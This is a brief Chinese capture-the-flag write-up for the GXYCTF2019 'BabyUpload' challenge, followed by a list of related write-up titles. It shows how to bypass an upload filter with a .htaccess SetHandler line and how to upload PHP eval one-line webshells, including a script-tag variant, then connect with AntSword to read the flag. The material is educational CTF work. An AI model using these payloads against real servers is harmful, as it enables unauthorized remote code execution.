题目
过程
png文件不许上传,尝试上传jpg
修改后缀名为.htaccess,文件内容为
SetHandler application/x-httpd-php
上传一句话木马
<?php eval($_POST[cmd]);?>
失败,换一种方式
<script language='php'>eval($_POST[cmd]);</script>
上传成功,蚁剑连接一下,在根目录找到flag
详细解决方案
[GXYCTF2019]BabyUpload
热度:8 发布时间:2024-02-04 16:26:45.0
相关解决方案
- 第三十七题——[GXYCTF2019]禁止套娃
- 第三十六题——[GXYCTF2019]BabyUpload
- 第二十八题——[GXYCTF2019]BabySQli
- 第十题——[GXYCTF2019]Ping Ping Ping
- [GXYCTF2019]Ping Ping Ping1
- BUUCTF-[GXYCTF2019] Ping Ping Ping
- buuxtf [HFCTF2020]BabyUpload
- GXYCTF2019 Ping Ping Ping 1
- [GXYCTF2019]禁止套娃 1
- sql联合注入伪造数据之[GXYCTF2019]BabySQli1
- BUUCTF,Web:[GXYCTF2019]Ping Ping Ping
- 《BUUCTF逆向题解》——[GXYCTF2019]luck_guy
- 【文件上传】buu_[GXYCTF2019]BabyUpload
- [GXYCTF2019]luck_guy
- [GXYCTF2019] web题-禁止套娃
- [GXYCTF2019]BabyUpload
- 【学习笔记 41】 buu [GXYCTF2019]BabyUpload
- 【GXYCTF2019】BabySQLi wp
- [GXYCTF2019]禁止套娃(.git泄露,php代码审计)
- BUUCTF系列 // [GXYCTF2019] Ping Ping Ping